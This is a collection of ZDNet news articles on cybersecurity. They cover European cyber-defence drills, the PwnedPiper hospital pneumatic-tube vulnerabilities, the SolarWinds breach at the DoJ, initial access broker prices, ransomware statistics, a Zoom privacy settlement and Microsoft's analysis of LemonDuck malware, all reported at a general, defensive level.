Information Technology

Countries in Central and Eastern Europe run regular drills of their cyber defenses, which have been extensively tested in recent cyberattacks.
Image: MR.Cole_Photographer/Getty
Cyberattacks are something every country has to deal with, but countries in Central and Eastern Europe are particularly wary of the occasional attack on their critical infrastructures and governments.

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

“Last year, we had over 4,300 incidents recorded,” Rytis Rainys, the director of the National Cyber Security Center of Lithuania, a country with a population of less than three million, tells ZDNet. “That comes down to over 100 each day. We are constantly dealing with this, and that makes having your national cyber defense in top-notch condition extremely important.” SEE: Network security policy (TechRepublic Premium)Most attacks in the region don’t make the headlines; others do. The attacks on Ukraine’s power grid in 2015 are still rooted in the collective memory of security professionals, while the global 2017 ransomware attack was first noticed in Ukraine. A decade earlier, some of Estonia’s key institutions of government and finance were under attack, an event that prompted the country to bolster its cyber defenses and seek international partnerships. More recently, Polish government officials had their private mailboxes hacked and messages leaked. Many had used their accounts for government communications – something that most security experts agree is not a good idea.Levelling the playing fieldThe reason IT infrastructure in Central and Eastern Europe seems to come under attack more frequently has to do with its proximity to – and relationship with – Russia, says Andrzej Kozlowski, a cybersecurity expert at Krakow-based think tank, Kosciuszko Institute. “The main difference between non-state and state actors conducting cyberattacks is that the latter does not need to balance costs with benefits,” he tells ZDNet.Not only do states have many more resources at hand, but they also don’t need short-term financial gratification. “During the pandemic, we have seen attacks on medical facilities, which are aimed to just create an extra burden,” says Kozlowski.

The Russian Federation in particular is a bit different in its methods than others. “These are not hackers employed by the state. Instead, we see a direct connection between actual cyber criminals and the secret service. When cyber criminals do something, nobody in Russia stops them and no one is ever extradited. This is unique. If you compare it to North Korea, for example, those are the security services doing the actual hacking.”The main benefit of that approach, according to Kozlowski, is that it offers plausible deniability that provides a shield from any consequences: “From the perspective of the Russian Federation, cyberspace is a great place to realize their goals. In a conventional military sense, Russia is no match for NATO. But in cyberspace, they can operate on a level playing field.”Beyond the firewallSo how do countries protect themselves? Lithuania regularly organizes cyber-defense exercises, both domestically and internationally, with the most recent being the Exercise Alarmex held in May of this year. These involve a ‘Blue Team’ and a ‘Red Team’ going head to head, with the latter attacking a mock IT infrastructure similar to the one used in real life. “We use virtual machines to create that network of the different organizations, and then we create scenarios which involve the Red Team trying to break into the network of the Blue Team, who try to defend themselves,” says Rainys.Awareness plays a key role in this approach, which is why Lithuania’s National Cyber Security Center takes around half a year to prepare. Participating organizations do not know the scenarios beforehand, says Rainys. They test out social engineering, with the Red Team receiving information on important players within the opposing organizations. “The Red Team would pose as internal IT personnel and call the executive directly to ask them for the password, or use other phishing methods,” he says. SEE: This new ransomware group claims to have breached over 30 organisations so farWhile in the past organizations were not always willing to participate, these days this isn’t such an issue. “Four years ago, when we started this, we had to really try to convince them, but companies and institutions see the need now,” says Rainys. “We have a matrix of around 100 organizations deemed nationally critical, and they are eager to participate as it’s a great security test which is basically free of charge for them.”Coordination is key, not just between different security teams, but between different organizational branches as well. “I participated in one such exercise myself,” Kozlowski says. “You also have different branches that hold their own responsibilities, such as the communication department that has to inform investors without causing panic.”Creating frameworksWhile the European Union gets criticism for being cumbersome, in the sense of cybersecurity it’s been solid, says Kozlowski. “One of the main strengths we have in Europe is that we can create laws that are subsequently implemented over the entire European Union. So you have things like the GDPR and the NIST Directive 1, while they are working on a second document.”The result is that all members of the European Union will implement minimal cybersecurity standards, says Kozolowski, meaning even the weakest points within the bloc will be comparatively resilient and overseen by ENISA, an EU agency for cybersecurity.European countries also collaborate militarily within the Permanent Structured Cooperation (PESCO) framework, within which sits the Lithuanian-led Cyber Rapid Response Teams (CRRTs), which conducts regular cyber-readiness drills. But there are also more international exercises – called Cyber Europe – organized by ENISA itself and NATO’s Cyber Coalition. Their purpose is to improve our ability to collaborate between incident management teams in different nations, Rainys says. “During attacks, loads of IP addresses are being used, so you need to coordinate to be able to block them.” While no single country, or even a bloc of collaborating countries, is ever truly ready for cyberattacks, they do need to build up and constantly tune their cybersecurity systems. And it’s not just resilience against attacks themselves. “The European Commission under Ursula von der Leyen has put a priority on digitization, and among other things have added cyber diplomacy to the toolbox to react to certain attacks,” says Kozlowski.”The main aim of exercises is to show policy makers how to react.” More

Security researchers have detailed vulnerabilities in the system controlling the pneumatic tube networks used in thousands of hospitals around the world, which could allow hackers to disrupt the services or potentially launch ransomware attacks.The series of vulnerabilities have been discovered in Nexus Control Panel, which powers current models of Translogic’s pneumatic tube system (PTS) stations by Swisslog Healthcare. The tubes allow staff to send patient test samples and medication around the hospital and are a key part of providing care to patients. 

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

Dubbed PwnedPiper, the nine security vulnerabilities have been detailed by cybersecurity researchers at Armis ahead of a presentation on the findings at Black Hat USA.  SEE: Cybersecurity: Let’s get tactical (ZDNet/TechRepublic special feature) | Download the free PDF version (TechRepublic) They include hard-coded passwords, a privilege escalation vulnerability, memory corruption bugs that can lead to remote-code-execution and denial of service and a design flaw in which firmware upgrades on the Nexus Control Panel are unencrypted and don’t require any cryptographic signature, which could allow an attacker to gain unauthenticated remote-code execution privileges by initiating a firmware update procedure while also maintaining persistence on the device.”It was surprisingly easy to find these vulnerabilities; too easy, I would say. Although this device has a crucial function in hospitals for the critical infrastructure, the type of vulnerabilities that we found are similar to stuff that you would find on an average IoT device,” Ben Seri, VP of research at Armis, told ZDNet.  To get to a Nexus Control Panel, an attacker would need some access to the network via a phishing attack or breached remote desktop credentials. 

According to Armis, the infrastructure is used in more than 3,000 hospitals worldwide, including 2,300 in the United States. Researchers warn that by exploiting vulnerabilities in these systems, attackers could gain control over the tube network.It could also provide attackers with the ability to exploit the escalation of privileges enabled by the vulnerabilities to gain access to other sections of the network to the extent they could launch a ransomware attack against the hospital network.”It wasn’t difficult to find vulnerabilities here. It’s just the system that is hidden in plain sight. You don’t think about it and, normally, you don’t connect it being related to any critical functions – it’s a lack of knowledge of this area which leads to vulnerabilities,” said Seri. The vulnerabilities have been disclosed to Swisslog and security updates are available to close them and protect networks – healthcare organisations using Translogic’s PTS are urged to apply them.  “I think the lesson to be learned here is that this is the story of IoT in a way. Many applications have moved over the years from analogue systems to digital systems and eventually to be connected to the network and then later to the internet,” said Seri. “From the hospital’s point of view, this is just another reason to go ahead and apply network segmentation in the most effective way possible,” he added.  SEE: Ransomware: Now gangs are using virtual machines to disguise their attacksIt’s also recommended that hospitals apply access controls across the network, such as multi-factor authentication, so that users can’t gain access to networks and systems they don’t have permission to use in order to prevent intruders from exploiting this ability. “Understanding that patient care depends not only on medical devices, but also on the operational infrastructure of a hospital is an important milestone to securing healthcare environments,” said Seri. Swisslog confirmed that Armis had contacted them about the vulnerabilities and that software updates and mitigations are now available to fix the vulnerabilities and prevent them potentially being exploited on hospital networks.  “Swisslog Healthcare has already begun rolling out these solutions and will continue to work with its customers and affected facilities. Our commitment to security as an organizational priority has prepared us to address these types of issues with efficiency and transparency,” a spokesperson said.  MORE ON CYBERSECURITY More

The US Justice Department (DoJ) has revealed the extent to which hackers had access to officials’ emails due to the SolarWinds breach it disclosed in January.The FBI, CISA, ODNI, and the NSA that month said it was most likely Kremlin-backed hackers that tainted a software update from enterprise IT vendor, SolarWinds. Since then, the US and UK have officially blamed Russian intelligence services for the attack and US president Joe Biden announced sanctions against Russia over it.  

ZDNet Recommends

The best cyber insurance

The cyber insurance industry is likely to go mainstream and is a simple cost of doing business. Here are a few options to consider.

Read More

The DoJ said in an updated statement that it was treating the source of attack as an Advanced Persistent Threat (APT) that gained much broader access to the department’s Microsoft Office 365 (O365) email systems than the 3% of non-classified email it initially thought was accessed. SEE: Network security policy (TechRepublic Premium)”While other districts were impacted to a lesser degree, the APT group gained access to the O365 email accounts of at least 80% of employees working in the U.S. Attorneys’ offices located in the Eastern, Northern, Southern, and Western Districts of New York,” the DoJ said in a new statement.  The department has published a list of the 27 districts that had one or more employees’ O365 email accounts compromised in the SolarWinds attack. These compromised accounts affected the US government and private sector, it added.  The DoJ has also disclosed that the hackers had access to compromised email accounts for at least six months, from around May 7 to December 27, 2020. 

“The Department is responding to this incident as if the Advanced Persistent Threat (APT) group responsible for the SolarWinds breach had access to all email communications and attachments found within the compromised O365 accounts,” the DoJ said.SEE: Ransomware: Paying up won’t stop you from getting hit again, says cybersecurity chiefCompromised data included all sent, received, and stored emails and attachments found within those accounts during that time, it said.  The SolarWinds breach resulted in the compromise of major US tech and cybersecurity companies and key federal agencies, including US Treasury Department, the Cybersecurity and Infrastructure Agency (CISA), The Department of Homeland Security (DHS), and the US Department of State, and the US Department of Energy (DOE).   More

The Initial Access Broker market continues to expand, with fees a drop in the ocean in comparison to the potential rewards of a successful ransomware attack. 

Initial Access Brokers (IABs) are individuals or groups who have managed to quietly obtain access to a corporate network or system through means including, but not limited to, stolen credentials, brute-force attacks, or by exploiting vulnerabilities.  In recent years, ransomware-as-a-service (RaaS) groups have taken an interest in these brokers, as by employing them directly or paying them a fee in return for access to a target system, they are able to avoid the first step of intrusion: the time-consuming process required to find a vulnerable endpoint.  On Monday, cybersecurity firm KELA published a report exploring the Initial Access Broker market and found that the average cost of network access was $5,400, while the median price was $1,000.  When you consider today’s ransomware demands are reaching millions of dollars, from a criminal’s perspective, this is a small price to pay.  The team examined over a thousand listings in dark web underground forums from July 1, 2020, to June 30, 2021, and found that initial access ads included a range of network and compromised account-based offerings — such as remote access to a computer in an organization — as well as domain-level privilege account access and both RDP and VPN-based remote access. In total, 25% of the listings were posted by brokers. 

Unsurprisingly, the most valuable offers — and, therefore, earning the top prices — were initial access services offering domain-level privileges in companies boasting hundreds of millions of dollars in revenue.  The most expensive initial access services were for an Australian company generating an annual revenue of $500 million for 12 Bitcoin (BTC), or roughly $478,000 — and access to an IT company in the United States, through ConnectWise, for 5 BTC ($200,000).  Access to small companies may cost as little as $200. “While some actors are ready to work for a percentage (a share from the amount gained in a successful ransomware attack), the majority of IAB prefer to stick to fixed prices,” KELA says. It should also be noted that as a string of high-profile ransomware attacks — including Kaseya and Colonial Pipeline — has put law enforcement and governments on notice, some brokers are moving from public adverts to private conversations with RaaS groups.  As the bottom line is at the heart of this business model, even if their services are not purchased, some Initial Access Brokers were linked to data theft — potentially in order to sell stolen records in bulk as an alternative revenue stream.  Top impacted countries included the United States, UK, Australia, France, and Canada.  The report does note that there seems to be some form of honor among thieves — with few ads found that relate to healthcare systems, such as those operated by hospitals. “IABs have become professional participants of the RaaS economy,” KELA says. “They constantly find new initial access vectors, expanding the attack surface, and follow their customers’ demands.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Australian logistics giant Toll is not sure whether it was the company that avoided assistance from the government when it was struck by ransomware.Last year, Toll found itself victim to ransomware on two occasions.See also: Ransomware: These are the two most common ways hackers get inside your networkAppearing before the Parliamentary Joint Committee on Intelligence and Security (PJCIS) as part of its review of the Security Legislation Amendment (Critical Infrastructure) Bill 2020 last month, Toll global head of information security Berin Lautenbach said his organisation had help from the Australian Signals Directorate (ASD), which included having software installed on its systems.During the hearing, Lautenbach, as well as the other organisations testifying before the PJCIS, was asked if it was his company ASD Director-General Rachel Noble was referring to when she revealed a company had declined to talk to the agency about an incident it had experienced.At the time, Lautenbach said “certainly not”. In a submission [PDF] made available on Monday, Toll has revised the testimony.

“We are very grateful for the Australian Signals Directorate’s (ASD) support during the two cyber attacks Toll experienced in 2020. Toll is not in a position to know which company Ms Noble is referring, and while indeed it may be Toll, we note that the ASD has never raised any formal concerns with our response to date,” the company wrote.”Following further internal discussions, we continue to be of the opinion that Toll acted transparently and cooperatively with the ASD. “However, we recognise that we may not have responded at the pace the ASD may have expected due to the crisis we were experiencing.”Noble had told the PJCIS in June that the ASD found out about the attack at a well-known company after reading about it in the media.”Then we tried to reach out to the company to clarify if the media reports were true, and they didn’t want to talk to us. We kept pushing … at times, we have spent nearly a week negotiating with lawyers about us even being able to obtain just the basic information,” she said. “Asking, ‘Can we please just have some data from your network; we might be able to help by telling you quickly who it is, what they’re doing and what they might do next?'”Noble said five days later, the ASD was still getting “very sluggish engagement”.”On day 14, we were only able to provide them with generic protection advice, and their network was still down. Three months later they got reinfected and we started again,” she said.Toll’s first attack happened in January, with the company reporting the second incident in late May.Noble in March last year told the Foreign Affairs, Defence and Trade Legislation Committee as part of Senate Estimates that the ASD and its Australian Cyber Security Centre (ACSC) had been working with Toll.”Throughout February this year, the ACSC has worked closely with Toll Group, at their behest, in relation to their recent ransomware incident,” she said in a statement entered straight into Hansard. “Our assistance has included providing technical experts to identify the nature and extent of the compromise, and provide Toll with tailored mitigation advice.”Need to disclose a breach? Read this: Notifiable Data Breaches scheme: Getting ready to disclose a data breach in AustraliaLATEST AUSTRALIAN SECURITY NEWS More

Image: Getty Images
Zoom has agreed to an $85 million settlement for a class action lawsuit that accused the company of improperly sharing user data through third-party software integrations with various digital platforms. The preliminary settlement [PDF] was filed over the weekend and is currently awaiting court approval. From March to May last year, 14 lawsuits were filed against Zoom, which then became a consolidated class action. In the lawsuit, the class members claimed Zoom misled users about its encryption capabilities, shared user data with digital platforms without consent, and had inadequate security and privacy controls, which resulted in zoombombings. Zoombombings are unwanted and unauthorised interruptions of Zoom meetings by outsider participants. The US Department of Justice last year made zoombombing a crime, with people that conduct zoombombing liable to fines or arrests on a variety of state or federal charges.  The $85 million amount, if approved, would be allocated so that users who paid for an account will be eligible to receive the greater amount of either 15% of the money they paid to Zoom for their core Zoom Meetings subscription or $25 from April to October 2020. Meanwhile, other users who did not have a paying account may be eligible to receive up to $15. While Zoom earned $1.3 billion in subscriptions from class members, the plaintiff’s lawyers said the $85 million settlement was reasonable in light of the significant risks of litigation. “Although plaintiffs firmly believe their liability case is strong and that class certification is warranted, it is uncertain whether the court ultimately would grant certification, deny a motion for summary judgment filed by Zoom, or ever find that plaintiffs are entitled to damages,” the plaintiff’s lawyers added.

Along with paying the $85 million payment, Zoom has also agreed to implement various changes focused on improving security, bolstering privacy, and safeguarding consumer data. The company has agreed to provide in-meeting notifications to make it easier for users to understand who can see, save, and share Zoom users’ information and content by alerting users when a meeting host or another participant uses a third-party application during a meeting. Zoom will also not reintegrate the Facebook software development kit (SDK) for iOS into Zoom meetings for a year and request that Facebook delete any US user data obtained from the SDK. In the settlement motion, the plaintiffs have also applied to have Zoom pay for its legal fees, which would amount to an additional $21.25 million. If the settlement is approved, Zoom will have denied any wrongdoings that were alleged in the lawsuit. Related Coverage More

A new report from SonicWall found that attempted ransomware attacks skyrocketed in the first half of 2021, with 304.7 million attempted attacks seen by the company. SonicWall researchers saw a record number of attempted attacks in both April and May but both months were beat by June, which had a record 78.4 million attempted ransomware attacks.The total figure of ransomware attacks seen by SonicWall in the first half of 2021 smashed the 2020 total of 304.6 million. The fact that the first six months of 2021 have already surpassed all of 2020 alarmed SonicWall researchers, who added that it represented a 151% year-on-year increase.”Even if we don’t record a single ransomware attempt in the entire second half (which is irrationally optimistic), 2021 will already go down as the worst year for ransomware SonicWall has ever recorded,” the report said. 
SonicWall
According to the 2021 SonicWall Cyber Threat Report, ransomware volume seen by the company hit massive year-to-date spikes in the US at 185% and the UK at 144%. The US, UK, Germany, South Africa and Brazil topped the list of countries most impacted by ransomware in the first half of 2021. Within the US, the hardest hit states from a ransomware perspective were Florida, which saw 111.1 million ransomware attempts. New York had 26.4 million, while Idaho saw 20.5 million, and Rhode Island as well as Louisiana dealt with nearly 9 million.

The report was compiled based on information gathered by the SonicWall Capture Threat Network, which “monitors and collects information from global devices” including more than 1.1 million security sensors in 215 countries and territories. The report also features cross-vector, threat related information shared among SonicWall security systems, including firewalls, email security devices, endpoint security solutions, honeypots, content filtering systems and the SonicWall Capture Advanced Threat Protection multi-engine sandbox. The network collects malware and IP reputation data from tens of thousands of firewalls and email security devices around the globe. The report also gleans insights through shared threat intelligence from more than 50 industry collaboration groups and research organizations.

The report notes that the ransomware problem continues to worsen, and the data proved that Q2 was far worse than Q1 for 2021. Q2 was the worst quarter ever recorded by the company, with a ransomware volume of 188.9 million, far surpassing the Q1 figure of 115.8 million. Ransomware attacks are also increasingly spreading worldwide. Europe suffered a 234% increase in ransomware volume while North America saw increases of 180%. Asia saw its high point in March.But the US still leads the way globally, nearly matching the ransomware volume of the next nine countries on the top 10 list for most attacked countries. 
SonicWall
For 2021, the most commonly attacked industry is the government, seeing three times as many attacks as last year. Government targets face more attacks than almost every other industry each month. By June, government customers saw 10 times as many ransomware attempts and an overall spike of 917%Customers in the education field also saw a significant number of ransomware attempts, with an increase of 615%. SonicWall Capture Labs threat researchers found alarming ransomware spikes across healthcare (594%) and retail (264%) organizations as well.The Ryuk, Cerber and SamSam ransomware groups accounted for 64% of all attempted ransomware attacks, according to data from SonicWall’s Capture Labs. Ryuk alone accounted for 93.9 million attempts, tripling the number of Ryuk attempts seen in the first six months of 2020.Cerber ended 2020 as the number two most seen ransomware family, according to SonicWall, and continued this trend with 52.5 million attempted attacks for the first six months of 2021, ramping up efforts in April and May. SamSam was able to double its volume from 2020 in the first half of 2021 with 49.7 million attempted attacks. In June alone, the group launched 15.7 million attacks. SonicWall CEO Bill Conner said the latest data shows that sophisticated threat actors are adapting their tactics and embracing ransomware to reap financial gain and sow discord. “With remote working still widespread, businesses continue to be highly exposed to risk, and criminals are acutely aware of uncertainty across the cyber landscape,” Conner said. 
SonicWall
The report also tracks malware, finding that compared to 2020, the instances seen by SonicWall have been decreasing since its peak of 10.5 billion instances in 2018. Malware reached a six year low in 2020 with 5.6 billion malware attempts and 2021 saw 2.5 billion malware attempts in the first six months of this year.”But as it will become apparent by reading the rest of this report, less malware isn’t the same as less cybercrime. Instead, it’s a sign that the traditional malware associated with spray-and-pray attacks of yesterday is being abandoned…usually in favor of more specialized, more sophisticated and more targeted attacks, capable of making criminals much more money and leaving much more devastation in their path,” the report said. Both North America and Europe saw dips in malware volume but Asian countries saw a 23% increase. Malware skyrocketed in India and Germany in the first part of the year, with India seeing 147.2 million malware attempts, an increase of 83% year over year, and Germany seeing 150.4 million malware attempts. Germany’s figures represented a staggering 465% increase.SonicWall researchers note that some countries outside of the top 10 list were still suffering from malware. SonicWall said an organization in Vietnam had a 36.4% chance of seeing a malware attempt, higher than any other country. The company’s Real-Time Deep Memory InspectionTM also discovered 185,945 “never-before-seen” malware variants, up 54% from the first half of 2020.The report did include some good news. The volume of malicious PDF files and Office files dropped for the first time since 2018. Malware targeting IoT skyrocketed in 2021 with more than 32 million attacks, and in the US attempts on IoT increased by 15%. “While the nine vulnerabilities, collectively known as ‘Name:Wreck,’ all have patches available as of the time of this writing, many IoT devices lack the ability to be easily patched (or patched at all), meaning we may see attacks arising from these vulnerabilities for years into the future,” the report noted.
SonicWall
Cryptojacking attempts also grew a staggering amount in the first half of 2021. Of the 51.1 million cyrptojacking attempts in 2021, the number of attacks rose 118% in Asia and 248% in Europe.”The continued rise of ransomware, cryptojacking and other unique forms of malware targeted at monetization, along with their evolution of tactics, are evidence that cybercriminal activity always follows the money and rapidly adapts to new opportunities and changing environments,” said SonicWall Vice President of Platform Architecture Dmitriy Ayrapetov. More

Microsoft has continued its analysis of the LemonDuck malware, known for installing crypto-miners in enterprise environments. It makes a strong case for why it is worth removing it from your network.  This group, according to Microsoft, has a well-stocked arsenal of hacking tools, tricks and exploits aimed at one thing: for their malware to retain exclusive access to a compromised network for as long as possible. While crypto-mining malware could be just a nuisance, LemonDuck attributes suggest the attacker group really do try to own compromised networks by disabling anti-malware, removing rival malware, and even automatically patching vulnerabilities — a competitive effort to keep rival attackers from feeding off its turf.  “This allows them to limit the visibility of the attack to [security operations center] analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present,” Microsoft explained in a follow-up analysis of LemonDuck to one it published previously. The critical so-called ProxyLogon Microsoft Exchange Server exploits from March and April were treated this way by LemonDuck attackers. They used the bugs to install web shells on Exchange servers for remote access to unpatched systems and to install additional LemonDuck malware. In some cases, LemonDuck attackers used renamed copies of the Microsoft Exchange On-Premises Mitigation Tool (released by Microsoft on March 15) to fix the bug they had used to gain access in the first place, according to Microsoft.   “They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities,” it adds.  They also use file-less malware that executes in-memory and process injection, making it harder to remove from an environment. 

Microsoft’s description of LemonDuck’s techniques and tools suggest the group put a lot of effort into being difficult to kick off a network while using multiple methods to gain a foothold, including exploits, password guessing attacks and exploits against SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. LemonDuck’s automated entry relies on a small file with JavaScript to launch a PowerShell CMD process that launches Notepad and the PowerShell script inside the JavaScript.  The manual entry includes RDP brute force password attacks or Exchange bugs. Human actors generate scheduled tasks and scripts to create file-less persistence by re-running the PowerShell download script to pull in command and control (C2) infrastructure. It’s all about re-enabling any malware components that have been disabled or removed. Remember that web shells persist on a system even after being patched.  To make persistence more resilient, they host scripts on multiple sites (making it difficult to take down), and as a backup, also use WMI Event Consumers, or an arsenal of tools that includes access RDP access, Exchange web shells, Screen Connect, and remote access tools (RATs). LemonDuck attempts to automatically disable the cloud-based Microsoft Defender for Endpoint real-time monitoring by adding the entire C: drive to the Microsoft Defender exclusion list. Windows 10 “Tamper protection” should prevent these actions.    Other vendors’ targeted by LemonDuck’s anti-malware removal activities include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes.  Once inside a network, one of LemonDuck’s tools tries to assess whether a compromised device is running Outlook. If so, it scans the mailbox for contacts and starts spreading malware in emails with .zip, .js, or .doc/.rtf files attached.     “The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector,” Microsoft explains.  “The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don’t gain web shell access the way they had.” In other words, LemonDuck might only be deploying crypto-miners that drain CPU resources, but the lengths they go to stay on a network put them in a different light than just a nuisance. It could be well-worth security teams’ time to review Microsoft’s tips towards the end of its analysis for hunting down LemonDuck threats and tools on a network because once LemonDuck is aboard, it really doesn’t want to leave. More